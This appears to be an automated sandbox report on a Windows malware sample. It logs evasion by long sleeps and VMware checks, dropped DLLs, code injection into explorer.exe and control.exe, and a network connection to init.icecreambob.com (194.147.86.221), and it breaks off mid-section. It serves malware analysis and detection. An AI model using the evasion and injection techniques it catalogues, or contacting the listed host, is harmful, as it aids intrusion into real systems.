Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5444	Thread sleep time: -3689348814741908s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144	Thread sleep count: 3957 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144	Thread sleep count: 4963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960	Thread sleep time: -9223372036854770s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jdlmh2q4.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\w34iw342.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yg5i0oy3.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4z2qptpk.dll			Jump to dropped file

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2882			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6491			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3957
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4963

Queries a list of all running processes

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 0000001A.00000000.574145790.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.506175893.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000001A.00000000.544399258.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.574145790.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000001A.00000000.544399258.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: mshta.exe, 00000015.00000002.496071849.000001752B919000.00000004.00000001.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: explorer.exe, 0000001A.00000000.574145790.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: mshta.exe, 0000000F.00000002.464472467.000001F6467F4000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: init.icecreambob.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 194.147.86.221 80			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: AA0000			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: D70000			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 92E000			Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: C:\Windows\System32\control.exe base: AA0000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\System32\control.exe base: D70000 protect: page execute and read and write			Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 92E000 value: 00			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 2988			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 6268			Jump to behavior

Creates a thread in another existing process (thread injection)

